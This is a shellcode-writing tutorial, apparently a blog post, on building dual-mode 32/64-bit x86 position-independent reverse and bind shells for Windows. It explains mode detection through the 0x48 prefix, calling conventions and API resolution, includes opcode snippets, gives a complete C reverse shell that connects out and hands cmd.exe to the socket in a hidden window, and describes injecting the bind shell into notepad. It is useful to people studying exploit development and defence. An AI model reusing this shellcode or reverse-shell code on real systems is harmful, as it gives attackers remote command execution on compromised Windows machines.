Shellcode: Dual mode PIC for x86 (Reverse and Bind Shells for Windows)

Introduction

In a nutshell, we’re mixing 32-bit and 64-bit x86 opcodes so that our Position Independent Code (PIC) executes successfully regardless of the operating system mode (legacy or long). Some of the code requires conditional jumps, but we try to avoid these wherever possible.

Writing code to run on both 32-bit and 64-bit Windows has usually required two entirely separate sources. The exception was when Peter Ferrie published code to execute calc.exe in both CPU modes. Here we try to extend his idea to a connect (reverse) shell and a bind shell.

Searching the export table for API addresses takes a similar approach to Peter’s code and relies on conditional jumps.

Because the calling conventions (Microsoft x64 vs stdcall) and the number of parameters differ for each API, the actual call to an API is made from separate pieces of code we refer to as “dispatchers”.

The resulting code is not 100% dual mode, although that is possible using a different approach to the one shown here. I don’t discuss a 100% dual mode assembly because it requires more space.

Linux

Here’s a simple dual mode x86 shellcode for Linux just to show how easy it is. 😉

shx

Calling Conventions

The 32-bit Windows API uses the standard calling convention (stdcall). The 64-bit Windows API uses the Microsoft x64 calling convention, which passes the first arguments in registers much like fastcall or the AMD64 ABI used by Linux/BSD/OSX.

  • Legacy Mode (32-bit)

With stdcall, all parameters to a function are placed on the stack (normally using the PUSH instruction). Before returning to the caller, the callee removes the parameters (normally using the RETN instruction with an immediate operand). With the cdecl convention, you’ll normally see the stack fixed by the caller using an ADD instruction.

Registers EAX, ECX and EDX are volatile and should be presumed destroyed by function calls.

Registers EBX, ESI, EDI and EBP are non-volatile and must be saved and restored by any function that uses them.

  • Long Mode (64-bit)

The first 4 parameters are placed in RCX, RDX, R8 and R9, in that order. The remaining parameters are placed on the stack. With the MSVC compiler, the 5th and any additional parameters are normally stored in pre-allocated stack space using the MOV instruction so as to avoid stack misalignment. The callee does not remove parameters from the stack before returning; that is left to the caller.

Registers RAX, RCX, RDX, R8, R9, R10, R11 are volatile and should be presumed destroyed by function calls.

Registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are non-volatile and must be saved and restored by any function that uses them.

Mode detection

Distinguishing between the 2 modes can be achieved using REX prefixes and the flags register, specifically the status flags that conditional jumps test to control the flow of execution.

Although both the NASM and YASM assemblers provide the operand size prefix o64, which essentially emits 0x48 at assembly time, we don’t use that here.

flags

The x64 REX prefix 0x48, which is also the 32-bit opcode for ‘DEC EAX’, will set the Sign Flag (SF) in 32-bit mode if EAX is initially zero. Setting EAX to zero first using SUB/XOR/AND will also set the Zero Flag (ZF) to 1.

Actually, even if EAX is not zero before DEC EAX, so long as the result is negative when read as a signed value (0x80000000 and above), SF will still be 1. You can also play around with various other conditional jumps; JL/JG for example.

For this code, we’ll perform conditional jumps based on ZF and SF flags.

Jump if Not Zero (JNZ) or Jump if Zero (JZ).

If testing the result of REX prefix, we use Jump if Not Sign (JNS) or Jump if Sign (JS).

There are probably lots of ways to distinguish between modes, so don’t limit your own code to this one approach.

Take the following code and consider what happens when it executes in 32-bit mode.

;
    xor    eax, eax
    dec    eax
    js     x32

First, we set the Zero Flag (ZF) to 1 with XOR EAX, EAX. The CPU will then take the jump to x32 because ‘DEC EAX’ sets SF to 1 and ZF to 0. You could alternatively use JNZ instead of JS; both are fine. If jumping to x64 code instead, you can use JZ or JNS.

In 64-bit mode however, the CPU will not take the jump, because the byte 0x48 that encodes ‘DEC EAX’ is instead a REX prefix used for 64-bit operations. Nothing is decremented, so the Sign Flag (SF) is unaffected and ZF remains 1.

We need to avoid using EAX where possible. In the final code it’s typically only used for detection purposes. You can also use ‘INC EAX’ to affect the flags register, which is what the Linux shellcode above does.

Home space for 64-bit mode

When you call an API in 64-bit mode, the callee expects 32 bytes of free stack, sometimes referred to as home space or shadow space depending on who you talk to. It may optionally save RCX, RDX, R8 and R9 here.

x64_hs

When the API accesses its stack parameters (the 5th onwards), it expects them to start at [rsp+40] or [rsp+28h], as illustrated: 32 bytes are for home space and 8 are for the return address.

Stack and Structure alignment

For 64-bit mode, the stack pointer must be a multiple of 16 at the point where the CALL to an API is made, so that SSE2 instructions operating on aligned stack data execute without causing exceptions. The CALL itself pushes an 8 byte return address, so on entry to any function, including our own code if it was reached by a CALL, the stack sits at 16 minus 8 and has to be adjusted before calling an API.

Since we’re dealing with both stdcall and Microsoft x64 calling conventions, I’ve opted to push all parameters on the stack and then use a separate piece of code for 64-bit mode.

Structures for 64-bit code have their pointer-sized fields aligned by 8 bytes. Although the assembly code does not define any structures, it’s important to know the offset of each field in a structure for both 32 and 64-bit mode.

STARTUPINFO for example defines 2 WORD values (wShowWindow and cbReserved2) which are followed by 4 bytes of padding in 64-bit mode so that the next pointer is aligned by 8, as you can see from the offset of the lpReserved2 field.

typedef struct _STARTUPINFOA {
    DWORD   cb;              //  +0 or  +0
    LPSTR   lpReserved;      //  +4 or  +8
    LPSTR   lpDesktop;       //  +8 or +16
    LPSTR   lpTitle;         // +12 or +24
    DWORD   dwX;             // +16 or +32
    DWORD   dwY;             // +20 or +36
    DWORD   dwXSize;         // +24 or +40
    DWORD   dwYSize;         // +28 or +44
    DWORD   dwXCountChars;   // +32 or +48
    DWORD   dwYCountChars;   // +36 or +52
    DWORD   dwFillAttribute; // +40 or +56
    DWORD   dwFlags;         // +44 or +60
    WORD    wShowWindow;     // +48 or +64
    WORD    cbReserved2;     // +50 or +66  <-- alignment adds 4 
    LPBYTE  lpReserved2;     // +52 or +72
    HANDLE  hStdInput;       // +56 or +80
    HANDLE  hStdOutput;      // +60 or +88
    HANDLE  hStdError;       // +64 or +96
} STARTUPINFOA, *LPSTARTUPINFOA;

Resolving and executing API

For those of you unfamiliar with this process, please refer to Resolving API addresses in memory.

I’ve followed the same idea in this code, where API hashes and additional parameters are accessed through ESI, although I may not use this in future. The address of the function that calls an API is stored in EBP.

An additional value, the parameter count, is stored before the API hash for the x64 dispatcher to use when popping arguments into RCX, RDX, R8 and R9. We also have to release the arguments on the stack after the call, since the callee does this under stdcall but not under Microsoft x64.

Here’s what the 32-bit source in x84.asm looks like when working with the PE Export Directory.

x84_asm

Now look at the disassembly for each mode, first 32-bit, which is essentially the same as the source above.

x32_dis

Then 64-bit

x64_dis

The ‘DEC EAX’ simply turns the opcode that follows it into a 64-bit operation when running in 64-bit mode, but the code still works fine in 32-bit mode provided we avoid using EAX as much as possible.

When writing dual mode assembly like this, just imagine EAX doesn’t really exist as a general purpose register and ‘DEC EAX’ is merely an instruction to tell the CPU you want the next operation to be 64-bit.

Advancing buffer by 4 or 8 bytes

As you can see from the STARTUPINFO structure above, some data types are 64-bit. When assigning our socket handle to hStdInput, hStdOutput and hStdError, we need to advance the buffer position by 8 bytes.

In 32-bit mode we only need to advance by 4. We could of course use conditional jumps for this, but instead we store the socket handle in EBX/RBX and the pointer to memory in EDI/RDI, then place the 0x48 byte before SCASD, which adds 4 or 8 to the pointer depending on CPU mode.

Since we need to avoid using EAX, we can’t use STOSQ, which would be the regular STOSD instruction prefixed with DEC EAX: STOS writes the value held in EAX/RAX, which the DEC would have modified in 32-bit mode.

;
    mov    cl, 3
rc_l6x:    
    mov    [edi], ebx  ; si.hStdInput  = s
    dec    eax         ; advance 4 or 8 depending on mode
    scasd
    loop   rc_l6x
//
  /* 01AE */ "\xb1\x03"    /* mov cl, 0x3         */
  /* 01B0 */ "\x89\x1f"    /* mov [rdi], ebx      */
  /* 01B2 */ "\x48\xaf"    /* scasq               */
  /* 01B4 */ "\xe2\xfa"    /* loop 0x1b0          */

The potential problem with this is that only the lower 32 bits of the handle are written, which would truncate a socket handle returned by WSASocketA if it occupies more than 32 bits on a 64-bit system.

Reverse shell

So finally, here’s a snippet of C code for a simple reverse shell on Windows that performs no error checking. Compile this with MSVC or MinGW and use netcat or the more advanced Ncat to set up a TCP listener on localhost:1234.

//
  PROCESS_INFORMATION pi;
  STARTUPINFO         si;
  WSADATA             wsa;
  SOCKET              s;
  struct sockaddr_in  sa;
  u_long              ip;
    
  WSAStartup (MAKEWORD(2, 0), &wsa);
  
  s=WSASocket (AF_INET, SOCK_STREAM, 
      IPPROTO_IP, NULL, 0, 0);

  ip = inet_addr ("127.0.0.1"); 
    
  sa.sin_family = AF_INET;
  sa.sin_port   = htons(1234);
  
  memcpy ((void*)&sa.sin_addr, 
      (void*)&ip, sizeof(ip));
    
  connect(s, (struct sockaddr*)&sa, sizeof(sa));

  memset ((void*)&si, 0, sizeof(si));

  si.cb         = sizeof(si);
  si.dwFlags    = STARTF_USESTDHANDLES;
  si.hStdInput  = (HANDLE)s;
  si.hStdOutput = (HANDLE)s;
  si.hStdError  = (HANDLE)s;

  CreateProcess (NULL, "cmd", NULL, NULL, 
    TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);

  WaitForSingleObject (pi.hProcess, INFINITE);
  
  CloseHandle(pi.hProcess);
  CloseHandle(pi.hThread);
  
  closesocket (s);

Demonstration

You can run a demo using the included Process Injector tool.

Here’s a screenshot of Windows NT 4.0 with the bind shell running inside notepad.

bind_nt

And here’s me connecting with ncat.

winnt

Summary

The most difficult part of writing code like this is dealing with the different calling conventions.

An exercise left to the reader would be writing something that entirely avoids the x64-only registers used in the x64 dispatcher here.

See the source code here for both bind/reverse shells and any future updates.
